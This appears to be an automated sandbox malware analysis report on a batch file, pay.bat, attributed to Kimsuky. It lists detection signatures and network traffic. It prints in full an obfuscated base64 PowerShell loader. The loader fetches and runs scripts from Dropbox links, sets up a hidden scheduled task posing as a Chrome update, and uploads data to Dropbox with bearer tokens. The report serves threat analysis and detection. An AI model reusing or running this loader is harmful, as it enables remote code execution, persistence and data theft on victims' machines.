Windows Analysis Report
pay.bat

Overview

General Information

Sample name: pay.bat
Analysis ID: 1563601
MD5: b262ac518c0114f414aaedbb4ef7c728
SHA1: fd02470c6cc4ceb5fad3589d02e5148a8c738b83
SHA256: 8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b
Tags: bat, user-1ZRR4H

Detection

Kimsuky
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Kimsuky
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pay.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2124 cmdline: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD MD5: 04029E121A0CFA5991749937DD22A1D9)
  • powershell.exe (PID: 5480 cmdline: PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\system_first.ps1 | JoeSecurity_Kimsuky_9 | Yara detected Kimsuky | Joe Security
C:\Users\user\AppData\Roaming\temp.ps1 | JoeSecurity_Kimsuky_9 | Yara detected Kimsuky | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Kimsuky_9 | Yara detected Kimsuky | Joe Security
00000003.00000002.1836552794.0000019FBB236000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Kimsuky_9 | Yara detected Kimsuky | Joe Security
00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Kimsuky_9 | Yara detected Kimsuky | Joe Security
00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Kimsuky_9 | Yara detected Kimsuky | Joe Security
00000002.00000002.1821493344.000002C3DAF29000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Kimsuky_9 | Yara detected Kimsuky | Joe Security

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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
                Source: Process startedAuthor: Timur Zinniatullin, oscd.community: Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command 
$cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
                Source: Process startedAuthor: frack113: Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2124, TargetFilename: C:\Users\user\AppData\Roaming\chrome.ps1
                No Suricata rule has matched


                AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 96.9% probability
Source: unknown; HTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.125.69.19:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.125.69.19:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.125.69.14:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.125.69.14:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiym6s9y2h&st=727cs1mx&dl=0 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: dl.dropboxusercontent.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: dl.dropboxusercontent.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /oauth2/token HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/x-www-form-urlencoded | Host: api.dropboxapi.com | Content-Length: 159 | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /oauth2/token HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/x-www-form-urlencoded | Host: api.dropboxapi.com | Content-Length: 159 | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /2/files/upload HTTP/1.1 | Authorization: Bearer sl.CBdrhtA2i7MANIpw6LV05cpSOoLdv8LvnoY9VkGFg7YlBb77gQrMcsF9m55TbOafoVTv8naCjUbVwtxc7jbXouTeU3K8hEtj7vBXfWB6bmcCs5gyarAD9QQM0bx36J2Y8K03Pn-kn6rS | Dropbox-API-Arg: { "path": "/githut/santa2_persist/192.168.2.4-1127_0234-XXX-santa2.txt", "mode": "add", "autorename": true, "mute": false } | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: content.dropboxapi.com | Content-Length: 14 | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /2/files/upload HTTP/1.1 | Authorization: Bearer sl.CBfm4jbAe6PaEM-X_WB0ay6vHknEpcftuCwu5RojrJUCQFGTL3H7Gnsupuxw0VS463sn_cG04wz7qMrHOVtsyBN_yRsfUnu8I2BRnyt7Wq8AnR-QIfaXepPMuo1Nk50hWk585bbxJvJg | Dropbox-API-Arg: { "path": "/github/santa2_first/192.168.2.4-1127_0234-RRR-santa2.txt", "mode": "add", "autorename": true, "mute": false } | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: content.dropboxapi.com | Content-Length: 49412 | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: dl.dropboxusercontent.com
Source: global traffic; DNS traffic detected: DNS query: api.dropboxapi.com
Source: global traffic; DNS traffic detected: DNS query: content.dropboxapi.com
Source: unknown; HTTP traffic detected: POST /oauth2/token HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/x-www-form-urlencoded | Host: api.dropboxapi.com | Content-Length: 159 | Connection: Keep-Alive
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api-env.dropbox-dns.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.dropboxapi.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://content.dropboxapi.com
                Source: powershell.exe, 00000003.00000002.1968058446.0000019FD31A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftz8
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.dropboxusercontent.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-api-env.dropbox-dns.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                Source: powershell.exe, 00000002.00000002.1844637093.000002C3E9B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCAEB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBAE41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBAE41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB83E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DBA0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.drH
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxap
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com/oaup
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com/oauth2/token
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com/oauth2/tokenp
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com/oauth2/top
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, system_first.ps1.2.dr, temp.ps1.3.drString found in binary or memory: https://content.drop
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxaH
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBDBEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com/2/files/upload
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com/2/files/uploadp
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com/2/files/uplop
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com/2/fp
                Source: powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAEBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAD5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmp, chrome.ps1.2.drString found in binary or memory: https://dl.dropboxusercontent.com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DADD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/scl/fi/g7mcsh
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAE08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DA8D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiy
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dropboxusercontent.com/
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
